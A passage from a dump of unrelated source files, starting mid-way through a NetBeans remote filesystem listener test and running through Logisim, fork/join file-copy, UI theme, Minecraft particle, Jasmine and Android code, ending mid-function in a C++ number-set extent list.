                throw ex;
            }
        } finally {
            removeRemoteDirIfNotNull(remoteBaseDir);
            if (localTmpDir != null && localTmpDir.exists()) {
                removeDirectory(localTmpDir);
            }
        }
    }

    // Modifies a watched file either externally (via /bin/sh on the file's host)
    // or internally (via the filesystem API), logging the resulting events.
    private void doTestListenersChange2(FileObject baseDirFO, File log, boolean externalChange) throws Exception {
        PrintStream out = new PrintStream(log);
        try {
            String prefix = baseDirFO.getPath();
            FileObject subdirFO = baseDirFO.createFolder("child_folder");
            FileObject childFO = subdirFO.createData("child_file_1");
            subdirFO.addFileChangeListener(new DumpingFileChangeListener("Dir listener", prefix, out, true));
            childFO.addFileChangeListener(new DumpingFileChangeListener("File listener", prefix, out, true));
            if (externalChange) {
                ExecutionEnvironment env = FileSystemProvider.getExecutionEnvironment(childFO);
                ProcessUtils.ExitStatus rc = ProcessUtils.execute(env, "/bin/sh", "-c", "echo new_content > " + childFO.getPath());
                assertTrue("external modification command failed", rc.exitCode == 0);
                if (env.isLocal()) {
                    //FileUtil.refreshAll();
                    File[] files = new File[] {FileUtil.toFile(subdirFO), FileUtil.toFile(childFO) };
                    FileUtil.refreshFor(files);
                    sleep(5000);
                }
                subdirFO.refresh();
            } else {
                writeFile(childFO, "new file content\n");
            }
        } finally {
            out.close();
        }
    }

    @ForAllEnvironments
    public void testListenersInternalChange() throws Throwable {
        doTestListenersChange1(false);
    }

    @ForAllEnvironments
    public void testListenersExternalChange() throws Throwable {
        doTestListenersChange1(true);
    }

    @ForAllEnvironments
    public void testListenersRename() throws Throwable {
        doTestListenersRename1(false);
    }

    @ForAllEnvironments
    public void testRecursiveListenersRename() throws Throwable {
        doTestListenersRename1(true);
    }

    @ForAllEnvironments
    public void testListenersDelete() throws Throwable {
        doTestListenersDelete1(false);
    }

    @ForAllEnvironments
    public void testRecursiveListenersDelete() throws Throwable {
        doTestListenersDelete1(true);
    }

    public static Test suite() {
        return RemoteApiTest.createSuite(ListenersParityTestCase.class);
    }
}
HoussemNasri/Logisim-Dark
src/logisim_src/gui/opts/ToolbarList.java
<gh_stars>1-10
/* Copyright (c) 2010, <NAME>. License information is located in the
 * logisim_src.Main source code and at www.cburch.com/logisim/. */

package logisim_src.gui.opts;

import java.awt.Component;
import java.awt.Graphics;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import javax.swing.AbstractListModel;
import javax.swing.DefaultListCellRenderer;
import javax.swing.Icon;
import javax.swing.JLabel;
import javax.swing.JList;
import javax.swing.ListSelectionModel;
import logisim_src.comp.ComponentDrawContext;
import logisim_src.data.AttributeEvent;
import logisim_src.data.AttributeListener;
import logisim_src.file.ToolbarData;
import logisim_src.file.ToolbarData.ToolbarListener;
import logisim_src.prefs.AppPreferences;
import logisim_src.tools.Tool;

// JList displaying the toolbar's tools (used in the options dialog),
// kept in sync with the underlying ToolbarData.
class ToolbarList extends JList {

    // Icon that delegates painting to the tool itself inside a 20x20 cell.
    private static class ToolIcon implements Icon {
        private Tool tool;

        ToolIcon(Tool tool) {
            this.tool = tool;
        }

        public void paintIcon(Component comp, Graphics g, int x, int y) {
            // Paint on a copy of the Graphics so the tool cannot disturb the caller's state.
            Graphics gNew = g.create();
            tool.paintIcon(new ComponentDrawContext(comp, null, null, g, gNew),
                    x + 2, y + 2);
            gNew.dispose();
        }

        public int getIconWidth() {
            return 20;
        }

        public int getIconHeight() {
            return 20;
        }
    }

    // Renders list cells: a Tool gets its display name plus icon,
    // null is shown as "---", anything else falls back to toString().
    private static class ListRenderer extends DefaultListCellRenderer {
        @Override
        public Component getListCellRendererComponent(JList list,
                Object value, int index, boolean isSelected,
                boolean cellHasFocus) {
            Component ret;
            Icon icon;
            if (value instanceof Tool) {
                Tool t = (Tool) value;
                ret = super.getListCellRendererComponent(list,
                        t.getDisplayName(), index, isSelected, cellHasFocus);
                icon = new ToolIcon(t);
            } else if (value == null) {
                ret = super.getListCellRendererComponent(list, "---",
                        index, isSelected, cellHasFocus);
                icon = null;
            } else {
                ret = super.getListCellRendererComponent(list, value.toString(),
                        index, isSelected, cellHasFocus);
                icon = null;
            }
            if (ret instanceof JLabel) {
                ((JLabel) ret).setIcon(icon);
            }
            return ret;
        }
    }

    // Adapts ToolbarData to Swing's ListModel and repaints the list when
    // toolbar contents, tool attributes, or the gate-shape preference change.
    private class Model extends AbstractListModel
            implements ToolbarListener, AttributeListener, PropertyChangeListener {
        public int getSize() {
            return base.size();
        }

        public Object getElementAt(int index) {
            return base.get(index);
        }

        public void toolbarChanged() {
            fireContentsChanged(this, 0, getSize());
        }

        public void attributeListChanged(AttributeEvent e) { }

        public void attributeValueChanged(AttributeEvent e) {
            repaint();
        }

        public void propertyChange(PropertyChangeEvent event) {
            // The gate-shape preference affects how tool icons are drawn.
            if (AppPreferences.GATE_SHAPE.isSource(event)) {
                repaint();
            }
        }
    }

    private ToolbarData base;
    private Model model;

    public ToolbarList(ToolbarData base) {
        this.base = base;
        this.model = new Model();
        setModel(model);
        setCellRenderer(new ListRenderer());
        setSelectionMode(ListSelectionModel.SINGLE_SELECTION);
        AppPreferences.GATE_SHAPE.addPropertyChangeListener(model);
        base.addToolbarListener(model);
        base.addToolAttributeListener(model);
    }

    public void localeChanged() {
        model.toolbarChanged();
    }
}
CembZy/java-bable
concurrent-plus/src/com/concurrent/ch02/forkjoin/recursiveaction/FindFilesAndCopy.java
<filename>concurrent-plus/src/com/concurrent/ch02/forkjoin/recursiveaction/FindFilesAndCopy.java
package io.renren.modules;

import java.io.*;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.nio.file.StandardCopyOption;
import java.util.ArrayList;
import java.util.Collection;
import java.util.List;
import java.util.concurrent.ForkJoinPool;
import java.util.concurrent.RecursiveAction;

/**
 * Uses a result-less fork/join task ({@link RecursiveAction}), submitted asynchronously,
 * to walk a directory tree and copy every matching file (*.docx) to a target directory.
 */
public class FindFilesAndCopy extends RecursiveAction {

    // Default destination directory for copied files (kept for backward compatibility).
    private static final String DEFAULT_TARGET_DIR = "C:\\Users\\86199\\Desktop\\clean\\";

    // Directory this task is responsible for scanning.
    private final File dir;

    public FindFilesAndCopy(File dir) {
        this.dir = dir;
    }

    @Override
    protected void compute() {
        File[] files = dir.listFiles();
        if (files == null) {
            // Not a directory, or unreadable: nothing to do.
            return;
        }
        // Subdirectories become child tasks; the number is unknown up front, so collect them.
        List<FindFilesAndCopy> subTasks = new ArrayList<>();
        for (File file : files) {
            if (file.isDirectory()) {
                // Directory: split off a subtask for the ForkJoinPool to execute.
                subTasks.add(new FindFilesAndCopy(file));
            } else if (file.getAbsolutePath().endsWith(".docx")) {
                // Matching file: copy it directly within this task.
                System.out.println(file.getAbsolutePath());
                try {
                    copyFile(file.getAbsolutePath());
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
        if (!subTasks.isEmpty()) {
            // invokeAll forks every subtask and returns once all of them are done.
            Collection<FindFilesAndCopy> finished = invokeAll(subTasks);
            for (FindFilesAndCopy task : finished) {
                // Already complete after invokeAll; join() only propagates a subtask failure.
                task.join();
                System.out.println(Thread.currentThread().getName() + "....join end..");
            }
        }
    }

    /**
     * Copies the given file into the default target directory.
     *
     * @param sourcePath absolute path of the file to copy
     * @throws IOException if the copy fails
     */
    public static void copyFile(String sourcePath) throws IOException {
        copyFile(sourcePath, DEFAULT_TARGET_DIR);
    }

    /**
     * Copies the given file into {@code targetDir}, replacing an existing file with
     * the same name. Uses {@link Files#copy} so the underlying streams are always
     * closed (the previous hand-rolled stream copy leaked both streams when an
     * I/O error occurred mid-copy).
     *
     * @param sourcePath absolute path of the file to copy
     * @param targetDir  directory to copy into (must exist)
     * @throws IOException if the copy fails
     */
    public static void copyFile(String sourcePath, String targetDir) throws IOException {
        Path src = Paths.get(sourcePath);
        Path dest = Paths.get(targetDir).resolve(src.getFileName());
        Files.copy(src, dest, StandardCopyOption.REPLACE_EXISTING);
    }

    private static void testFork() {
        ForkJoinPool forkJoinPool = new ForkJoinPool();
        FindFilesAndCopy findFiles = new FindFilesAndCopy(new File("D:\\clean\\xiangxue\\VIP"));
        // execute() is asynchronous: it submits the root task without blocking.
        forkJoinPool.execute(findFiles);
        // Block until the whole fork/join computation finishes before continuing.
        findFiles.join();
        System.out.println("end.....");
    }

    public static void main(String[] args) {
        testFork();
    }
}
halotroop2288/consulo
modules/desktop-awt/desktop-ui-laf-impl/src/main/java/consulo/desktop/ui/laf/idea/darcula/DarculaPopupMenuBorder.java
// Copyright 2000-2019 JetBrains s.r.o. Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file. package consulo.desktop.ui.laf.idea.darcula; import com.intellij.ide.ui.laf.intellij.IdeaPopupMenuUI; import com.intellij.ui.Gray; import com.intellij.ui.JBColor; import com.intellij.util.ui.JBInsets; import com.intellij.util.ui.JBUI; import javax.swing.border.AbstractBorder; import javax.swing.plaf.UIResource; import javax.swing.plaf.basic.BasicComboPopup; import java.awt.*; import java.awt.geom.Path2D; /** * @author <NAME> */ public class DarculaPopupMenuBorder extends AbstractBorder implements UIResource { private static final JBInsets DEFAULT_INSETS = JBUI.insets(1); @Override public void paintBorder(Component c, Graphics g, int x, int y, int width, int height) { if (IdeaPopupMenuUI.isUnderPopup(c)) { return; } Graphics2D g2 = (Graphics2D)g.create(); try { g2.setColor(JBColor.namedColor("Menu.borderColor", new JBColor(Gray.xCD, Gray.x51))); g2.fill(getBorderShape(c, new Rectangle(x, y, width, height))); } finally { g2.dispose(); } } private static Shape getBorderShape(Component c, Rectangle rect) { Path2D border = new Path2D.Float(Path2D.WIND_EVEN_ODD); if (isComboPopup(c) && ((BasicComboPopup)c).getClientProperty("JComboBox.isCellEditor") == Boolean.TRUE) { JBInsets.removeFrom(rect, JBInsets.create(0, 1)); } border.append(rect, false); Rectangle innerRect = new Rectangle(rect); JBInsets.removeFrom(innerRect, JBUI.insets(JBUI.getInt("PopupMenu.borderWidth", 1))); border.append(innerRect, false); return border; } @Override public Insets getBorderInsets(Component c) { if (isComboPopup(c)) { return JBInsets.create(1, 2).asUIResource(); } if (IdeaPopupMenuUI.isUnderPopup(c)) { return JBUI.insets("PopupMenu.borderInsets", DEFAULT_INSETS).asUIResource(); } return DEFAULT_INSETS.asUIResource(); } protected static boolean isComboPopup(Component c) { return "ComboPopup.popup".equals(c.getName()) && c instanceof BasicComboPopup; } }
p455w0rd/EndermanEvolution
src/main/java/p455w0rd/endermanevo/client/particle/ParticleEvolvedEndermanAggroPortal.java
<filename>src/main/java/p455w0rd/endermanevo/client/particle/ParticleEvolvedEndermanAggroPortal.java package p455w0rd.endermanevo.client.particle; import net.minecraft.client.particle.IParticleFactory; import net.minecraft.client.particle.Particle; import net.minecraft.client.renderer.*; import net.minecraft.entity.Entity; import net.minecraft.world.World; import net.minecraftforge.fml.relauncher.Side; import net.minecraftforge.fml.relauncher.SideOnly; /** * @author p455w0rd * */ public class ParticleEvolvedEndermanAggroPortal extends Particle { private final float portalParticleScale; private final double portalPosX; private final double portalPosY; private final double portalPosZ; public ParticleEvolvedEndermanAggroPortal(World worldIn, double xCoordIn, double yCoordIn, double zCoordIn, double xSpeedIn, double ySpeedIn, double zSpeedIn) { super(worldIn, xCoordIn, yCoordIn, zCoordIn, xSpeedIn, ySpeedIn, zSpeedIn); motionX = xSpeedIn; motionY = ySpeedIn; motionZ = zSpeedIn; posX = xCoordIn; posY = yCoordIn; posZ = zCoordIn; portalPosX = posX; portalPosY = posY; portalPosZ = posZ; float f = rand.nextFloat() * 0.6F + 0.4F; particleScale = rand.nextFloat() * 0.2F + 0.5F; portalParticleScale = particleScale; particleRed = f * 1.0F; particleGreen = f * 0.1F; particleBlue = f * 0.2F; particleMaxAge = (int) (Math.random() * 10.0D) + 40; setParticleTextureIndex((int) (Math.random() * 8.0D)); } @Override public void move(double x, double y, double z) { setBoundingBox(getBoundingBox().offset(x, y, z)); resetPositionToBB(); } /** * Renders the particle */ @Override public void renderParticle(BufferBuilder worldRendererIn, Entity entityIn, float partialTicks, float rotationX, float rotationZ, float rotationYZ, float rotationXY, float rotationXZ) { float f = (particleAge + partialTicks) / particleMaxAge; f = 1.0F - f; f = f * f; f = 1.0F - f; particleScale = portalParticleScale * f; GlStateManager.pushMatrix(); GlStateManager.disableLighting(); 
OpenGlHelper.setLightmapTextureCoords(OpenGlHelper.lightmapTexUnit, 260f, 260f); super.renderParticle(worldRendererIn, entityIn, partialTicks, rotationX, rotationZ, rotationYZ, rotationXY, rotationXZ); GlStateManager.popMatrix(); } @Override public int getBrightnessForRender(float brightness) { int i = super.getBrightnessForRender(brightness); float f = (float) particleAge / (float) particleMaxAge; f = f * f; f = f * f; int j = i & 255; int k = i >> 16 & 255; k = k + (int) (f * 15.0F * 16.0F); if (k > 240) { k = 240; } return j | k << 16 / 200; } @Override public void onUpdate() { prevPosX = posX; prevPosY = posY; prevPosZ = posZ; float f = (float) particleAge / (float) particleMaxAge; float f1 = -f + f * f * 2.0F; float f2 = 1.0F - f1; posX = portalPosX + motionX * f2; posY = portalPosY + motionY * f2 + (1.0F - f); posZ = portalPosZ + motionZ * f2; if (particleAge++ >= particleMaxAge) { setExpired(); } } @SideOnly(Side.CLIENT) public static class Factory implements IParticleFactory { @Override public Particle createParticle(int particleID, World worldIn, double xCoordIn, double yCoordIn, double zCoordIn, double xSpeedIn, double ySpeedIn, double zSpeedIn, int... p_178902_15_) { return new ParticleEvolvedEndermanPortal(worldIn, xCoordIn, yCoordIn, zCoordIn, xSpeedIn, ySpeedIn, zSpeedIn); } } }
thiagobfb/jasmine-standalone
spec/andCallTroughSpec.js
// Demonstrates the difference between a spy configured with and.callThrough()
// (delegates to the real implementation) and a bare spy (returns undefined).
describe('Testes do objeto and.callThrough', () => {

    let calculadora = {
        somar: function (n1, n2) {
            return n1 + n2;
        },
        subtrair: function (n1, n2) {
            return n1 - n2;
        }
    };

    beforeAll(() => {
        // 'somar' keeps its real behaviour; 'subtrair' becomes a stub.
        spyOn(calculadora, 'somar').and.callThrough();
        spyOn(calculadora, 'subtrair');
    });

    it('deve executar o método somar original', () => {
        expect(calculadora.somar(1, 1)).toEqual(2);
        // The bare spy swallows the call, so the result is undefined.
        expect(calculadora.subtrair(2, 1)).toBeUndefined();
    });
});
XuanYuan1122/momole
app/src/main/java/com/moemoe/lalala/presenter/BagContract.java
package com.moemoe.lalala.presenter;

import com.moemoe.lalala.model.entity.BagDirEntity;
import com.moemoe.lalala.model.entity.BagEntity;
import com.moemoe.lalala.model.entity.FileEntity;
import com.moemoe.lalala.model.entity.Image;
import com.moemoe.lalala.model.entity.ShowFolderEntity;

import java.util.ArrayList;

/**
 * MVP contract for the "bag" (user storage) feature: the {@link Presenter}
 * issues bag/folder operations and the {@link View} receives their results.
 *
 * Created by yi on 2016/11/29.
 */
public interface BagContract {

    /** Presenter side: each method triggers an async operation reported back via {@link View}. */
    interface Presenter extends BasePresenter{
        /** Opens (creates/updates) the bag with the given display name, cover image and type. */
        void openBag(String name,Image image,int type);
        /** Loads the bag summary for the given user. */
        void getBagInfo(String userId);
        /** Loads one page (index) of the user's folders filtered by type. */
        void getFolderList(String userId,int index,String type);
        /** Creates a folder with price (coin), cover, initial items and read permission. */
        void createFolder(String folderName,int coin,Image cover,ArrayList<Object> items,String readType);
        /** Updates an existing folder's metadata. */
        void modifyFolder(String folderId,String folderName,int coin,Image cover,long size,String readType);
        /** Uploads the given items into an existing folder. */
        void uploadFilesToFolder(String folderId,ArrayList<Object> items);
        /** Loads one page (index) of a folder's contents. */
        void getFolderItemList(String folderId,int index);
        /** Checks whether the given upload size is within quota; result via onCheckSize. */
        void checkSize(long size);
        /** Purchases access to a paid folder. */
        void buyFolder(String folderId);
        /** Deletes all folders whose ids are listed. */
        void deleteFolder(ArrayList<String> ids);
        /** Subscribes to a folder. */
        void followFolder(String folderId);
        /** Unsubscribes from a folder. */
        void unFollowFolder(String folderId);
        /** Loads a single folder's detail for the given user. */
        void getFolder(String userId,String folderId);
    }

    /** View side: callbacks invoked by the presenter when an operation completes. */
    interface View extends BaseView{
        void openOrModifyBagSuccess();
        void loadBagInfoSuccess(BagEntity entity);
        /** isPull distinguishes pull-to-refresh (replace) from load-more (append). */
        void loadFolderListSuccess(ArrayList<ShowFolderEntity> entities, boolean isPull);
        void createFolderSuccess();
        void uploadFolderSuccess();
        /** isPull distinguishes pull-to-refresh (replace) from load-more (append). */
        void loadFolderItemListSuccess(ArrayList<FileEntity> entities, boolean isPull);
        /** isOk is true when the checked size fits within the user's quota. */
        void onCheckSize(boolean isOk);
        void onBuyFolderSuccess();
        void deleteFolderSuccess();
        void modifyFolderSuccess();
        /** follow reflects the new subscription state after the toggle succeeded. */
        void onFollowOrUnFollowFolderSuccess(boolean follow);
        void onLoadFolderSuccess(BagDirEntity entity);
        void onLoadFolderFail();
    }
}
npocmaka/Windows-Server-2003
base/fs/utils/ifsutil/src/numset.cxx
#include <pch.cxx>

#define _NTAPI_ULIB_
#define _IFSUTIL_MEMBER_

#include "ulib.hxx"
#include "ifsutil.hxx"
#include "numset.hxx"
#include "iterator.hxx"

//
// NUMBER_SET: a set of BIG_INTs stored as a sorted list of disjoint,
// coalesced extents (NUMBER_EXTENT = {Start, Length}).  A single cached
// list iterator (_iterator) is shared by all operations; AddStart/AddNext
// deliberately exploit its persisted position (see their comments).
// _card tracks the total number of elements across all extents.
//

DEFINE_EXPORTED_CONSTRUCTOR( NUMBER_SET, OBJECT, IFSUTIL_EXPORT );

DEFINE_CONSTRUCTOR( NUMBER_EXTENT, OBJECT );

// Constructor worker: empty set, no iterator allocated yet.
VOID
NUMBER_SET::Construct (
    )
{
    _card = 0;
    _iterator = NULL;
}

// Returns the NUMBER_SET to its initial state, freeing all extents
// and the cached iterator.
VOID
NUMBER_SET::Destroy(
    )
{
    _list.DeleteAllMembers();
    _card = 0;
    DELETE(_iterator);
}

IFSUTIL_EXPORT
NUMBER_SET::~NUMBER_SET(
    )
{
    Destroy();
}

// Initializes (or re-initializes) the set for new input.
// Returns FALSE on allocation failure, TRUE on success.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::Initialize(
    )
{
    Destroy();

    if (!_list.Initialize() ||
        !(_iterator = _list.QueryIterator())) {

        Destroy();
        return FALSE;
    }

    return TRUE;
}

// Adds 'Number' to the set, merging/extending neighbouring extents so the
// list stays sorted and coalesced.  Searches backwards from the list end.
// Returns FALSE only on allocation failure (adding a duplicate is a no-op
// that returns TRUE).
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::Add(
    IN  BIG_INT Number
    )
{
    PNUMBER_EXTENT  p, pn;
    PNUMBER_EXTENT  new_extent;
    BIG_INT         next;

    DebugAssert(_iterator);

    // Position on the last extent whose Start <= Number.
    _iterator->Reset();
    while (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) {
        if (p->Start <= Number) {
            break;
        }
    }

    if (p) {

        next = p->Start + p->Length;

        // Already contained.
        if (Number < next) {
            return TRUE;
        }

        // Immediately after this extent: extend it and, if the gap to the
        // following extent closed, merge the two.
        if (Number == next) {

            p->Length += 1;
            _card += 1;

            if (pn = (PNUMBER_EXTENT) _iterator->GetNext()) {
                if (pn->Start == Number + 1) {
                    p->Length += pn->Length;
                    pn = (PNUMBER_EXTENT) _list.Remove(_iterator);
                    DELETE(pn);
                }
            }

            return TRUE;
        }
    }

    // Immediately before the following extent: grow it downwards.
    if (p = (PNUMBER_EXTENT) _iterator->GetNext()) {
        if (Number + 1 == p->Start) {
            p->Start = Number;
            p->Length += 1;
            _card += 1;
            return TRUE;
        }
    }

    // Isolated number: insert a fresh one-element extent at the iterator.
    if (!(new_extent = NEW NUMBER_EXTENT)) {
        return FALSE;
    }

    new_extent->Start = Number;
    new_extent->Length = 1;

    if (!_list.Insert(new_extent, _iterator)) {
        DELETE(new_extent);
        return FALSE;
    }

    _card += 1;

    return TRUE;
}

// Adds 'Number' to the set.  Call once before a run of AddNext calls: it
// leaves _iterator positioned so AddNext can continue from where this call
// ended instead of re-scanning from the list end.
// NOTE: do not interleave other calls of this class between AddStart and
// AddNext.  Returns FALSE only on allocation failure.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::AddStart(
    IN  BIG_INT Number
    )
{
    PNUMBER_EXTENT  p, pn;
    PNUMBER_EXTENT  new_extent;
    BIG_INT         next;

    DebugAssert(_iterator);

    _iterator->Reset();
    p = (PNUMBER_EXTENT) _iterator->GetPrevious();
    while (p != NULL) {
        if (p->Start <= Number) {

            next = p->Start + p->Length;

            // if within range, then done
            if (Number < next)
                return TRUE;

            // if passed the range by 1, try to expand the range to include it
            if (Number == next) {

                p->Length += 1;
                _card += 1;

                // see if the next range can be merged with the expanded range
                if (pn = (PNUMBER_EXTENT) _iterator->GetNext()) {
                    if (pn->Start == Number + 1) {
                        p->Length += pn->Length;
                        pn = (PNUMBER_EXTENT) _list.Remove(_iterator);
                        DELETE(pn);
                    }
                }
                // Leave the iterator on the extent just grown, for AddNext.
                p = (PNUMBER_EXTENT)_iterator->GetPrevious();
                return TRUE;
            }

            // if less than the next range by 1, try to expand the range to
            // include it.  There won't be a merge as there must be more than
            // one hole in between the two ranges
            if (p = (PNUMBER_EXTENT) _iterator->GetNext()) {
                if (p->Start <= Number)
                    continue;
                if ((Number+1) == p->Start) {
                    p->Start = Number;
                    p->Length += 1;
                    _card += 1;
                    return TRUE;
                }
            }
            break;
        } else {
            // search backwards
            p = (PNUMBER_EXTENT) _iterator->GetPrevious();
            if (p == NULL) {
                // Fell off the front: Number precedes every extent; see if it
                // abuts the first one.
                p = (PNUMBER_EXTENT) _iterator->GetNext();
                DebugAssert(p);
                if (p && ((Number+1) == p->Start)) {
                    p->Start = Number;
                    p->Length += 1;
                    _card += 1;
                    return TRUE;
                }
                break;
            }
        }
    }

    if (!(new_extent = NEW NUMBER_EXTENT)) {
        return FALSE;
    }

    new_extent->Start = Number;
    new_extent->Length = 1;

    if (!_list.Insert(new_extent, _iterator)) {
        DELETE(new_extent);
        return FALSE;
    }

    _card += 1;
    // Reposition the iterator on the inserted extent for AddNext.
    p = (PNUMBER_EXTENT) _iterator->GetPrevious();

    return TRUE;
}

// Adds 'Number' to the set, continuing the scan from the iterator position
// left by the previous AddStart/AddNext instead of restarting from the list
// end (unlike Add).  NOTE: do not interleave other calls of this class
// between AddNext calls.  Returns FALSE only on allocation failure.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::AddNext(
    IN  BIG_INT Number
    )
{
    PNUMBER_EXTENT  p, pn;
    PNUMBER_EXTENT  new_extent;
    BIG_INT         next;

    DebugAssert(_iterator);

    // Resume from the cached position; fall back to a full reset if the
    // iterator no longer points at an extent.
    if (!(p = (PNUMBER_EXTENT) _iterator->GetCurrent())) {
        _iterator->Reset();
        p = (PNUMBER_EXTENT) _iterator->GetPrevious();
    }
    while (p != NULL) {
        if (p->Start <= Number) {

            next = p->Start + p->Length;

            // if within range, then done
            if (Number < next)
                return TRUE;

            // if passed the range by 1, try to expand the range to include it
            if (Number == next) {

                p->Length += 1;
                _card += 1;

                // see if the next range can be merged with the expanded range
                if (pn = (PNUMBER_EXTENT) _iterator->GetNext()) {
                    if (pn->Start == Number + 1) {
                        p->Length += pn->Length;
                        pn = (PNUMBER_EXTENT) _list.Remove(_iterator);
                        DELETE(pn);
                    }
                }
                p = (PNUMBER_EXTENT)_iterator->GetPrevious();
                return TRUE;
            }

            // if less than the next range by 1, try to expand the range to
            // include it.  There won't be a merge as there must be more than
            // one hole in between the two ranges
            if (p = (PNUMBER_EXTENT) _iterator->GetNext()) {
                if (p->Start <= Number)
                    continue;
                if ((Number+1) == p->Start) {
                    p->Start = Number;
                    p->Length += 1;
                    _card += 1;
                    return TRUE;
                }
            }
            break;
        } else {
            // search backwards
            p = (PNUMBER_EXTENT) _iterator->GetPrevious();
            if (p == NULL) {
                p = (PNUMBER_EXTENT) _iterator->GetNext();
                DebugAssert(p);
                if (p && ((Number+1) == p->Start)) {
                    p->Start = Number;
                    p->Length += 1;
                    _card += 1;
                    return TRUE;
                }
                break;
            }
        }
    }

    if (!(new_extent = NEW NUMBER_EXTENT)) {
        return FALSE;
    }

    new_extent->Start = Number;
    new_extent->Length = 1;

    if (!_list.Insert(new_extent, _iterator)) {
        DELETE(new_extent);
        return FALSE;
    }

    _card += 1;
    p = (PNUMBER_EXTENT) _iterator->GetPrevious();

    return TRUE;
}

// Adds the run [Start, Start+Length) one element at a time.
// NOTE(review): O(Length) calls to Add, each of which rescans the list —
// fine for small runs, quadratic for large ones.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::Add(
    IN  BIG_INT Start,
    IN  BIG_INT Length
    )
{
    BIG_INT i, sup;
    BOOLEAN r;

    sup = Start + Length;
    r = TRUE;
    for (i = Start; i < sup; i += 1) {
        r = Add(i) && r;
    }

    return r;
}

// Union: adds every disjoint range of 'NumberSet' to this set.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::Add(
    IN  PCNUMBER_SET    NumberSet
    )
{
    ULONG   i, n;
    BIG_INT s, l;

    n = NumberSet->QueryNumDisjointRanges();
    for (i = 0; i < n; i++) {
        NumberSet->QueryDisjointRange(i, &s, &l);
        if (!Add(s, l)) {
            return FALSE;
        }
    }

    return TRUE;
}

// Same as Add(Number) but additionally reports through '*Duplicate' whether
// the number was already present.  Returns FALSE only on allocation failure.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::CheckAndAdd(
    IN  BIG_INT  Number,
    OUT PBOOLEAN Duplicate
    )
{
    PNUMBER_EXTENT  p, pn;
    PNUMBER_EXTENT  new_extent;
    BIG_INT         next;

    DebugAssert(_iterator);
    DebugAssert(Duplicate);

    *Duplicate = FALSE;

    _iterator->Reset();
    while (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) {
        if (p->Start <= Number) {
            break;
        }
    }

    if (p) {

        next = p->Start + p->Length;

        if (Number < next) {
            *Duplicate = TRUE;
            return TRUE;
        }

        if (Number == next) {

            p->Length += 1;
            _card += 1;

            if (pn = (PNUMBER_EXTENT) _iterator->GetNext()) {
                if (pn->Start == Number + 1) {
                    p->Length += pn->Length;
                    pn = (PNUMBER_EXTENT) _list.Remove(_iterator);
                    DELETE(pn);
                }
            }

            return TRUE;
        }
    }

    if (p = (PNUMBER_EXTENT) _iterator->GetNext()) {
        if (Number + 1 == p->Start) {
            p->Start = Number;
            p->Length += 1;
            _card += 1;
            return TRUE;
        }
    }

    if (!(new_extent = NEW NUMBER_EXTENT)) {
        return FALSE;
    }

    new_extent->Start = Number;
    new_extent->Length = 1;

    if (!_list.Insert(new_extent, _iterator)) {
        DELETE(new_extent);
        return FALSE;
    }

    _card += 1;

    return TRUE;
}

// Removes 'Number' from the set, trimming, shrinking, deleting or splitting
// the containing extent as required.  Removing an absent number is a no-op.
// Returns FALSE only on allocation failure (when an extent must be split).
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::Remove(
    IN  BIG_INT Number
    )
{
    PNUMBER_EXTENT  p;
    PNUMBER_EXTENT  new_extent;
    BIG_INT         next, new_length;

    DebugAssert(_iterator);

    // Position on the last extent whose Start <= Number.
    _iterator->Reset();
    while (p = (PNUMBER_EXTENT) _iterator->GetNext()) {
        if (p->Start > Number) {
            break;
        }
    }

    if (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) {

        next = p->Start + p->Length;

        // Number is the first element: trim the front (delete if now empty).
        if (p->Start == Number) {
            p->Start += 1;
            p->Length -= 1;
            _card -= 1;
            if (p->Length == 0) {
                p = (PNUMBER_EXTENT) _list.Remove(_iterator);
                DELETE(p);
            }
            return TRUE;
        }

        // Number is the last element: trim the back.
        if (Number + 1 == next) {
            p->Length -= 1;
            _card -= 1;
            return TRUE;
        }

        // Number is interior: split the extent in two around it.
        if (Number < next) {

            if (!(new_extent = NEW NUMBER_EXTENT)) {
                return FALSE;
            }

            _iterator->GetNext();
            if (!_list.Insert(new_extent, _iterator)) {
                DELETE(new_extent);
                return FALSE;
            }

            new_length = Number - p->Start;
            new_extent->Start = Number + 1;
            new_extent->Length = p->Length - 1 - new_length;
            p->Length = new_length;
            _card -= 1;
        }
    }

    return TRUE;
}

// Empties the set, freeing every extent.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::RemoveAll(
    )
{
    PNUMBER_EXTENT  p;

    DebugAssert(_iterator);

    _iterator->Reset();
    if ((p = (PNUMBER_EXTENT) _iterator->GetNext()))
        do {
            p = (PNUMBER_EXTENT) _list.Remove(_iterator);
            DELETE(p);
        } while ((p=(PNUMBER_EXTENT)_iterator->GetCurrent()));
    _card = 0;
    return TRUE;
}

// Same as Remove(Number) but additionally reports through '*DoesExists'
// whether the number was actually present.  Returns FALSE only on
// allocation failure.
IFSUTIL_EXPORT
BOOLEAN
NUMBER_SET::CheckAndRemove(
    IN  BIG_INT     Number,
    OUT PBOOLEAN    DoesExists
    )
{
    PNUMBER_EXTENT  p;
    PNUMBER_EXTENT  new_extent;
    BIG_INT         next, new_length;

    DebugAssert(_iterator);
    DebugAssert(DoesExists);

    *DoesExists = FALSE;

    _iterator->Reset();
    while (p = (PNUMBER_EXTENT) _iterator->GetNext()) {
        if (p->Start > Number) {
            break;
        }
    }

    if (p = (PNUMBER_EXTENT) _iterator->GetPrevious()) {

        next = p->Start + p->Length;

        if (p->Start == Number) {
            p->Start += 1;
            p->Length -= 1;
            _card -= 1;
            *DoesExists = TRUE;
            if (p->Length == 0) {
                p = (PNUMBER_EXTENT) _list.Remove(_iterator);
                DELETE(p);
            }
            return TRUE;
        }

        if (Number + 1 == next) {
            p->Length -= 1;
            _card -= 1;
            *DoesExists = TRUE;
            return TRUE;
        }

        if (Number < next) {

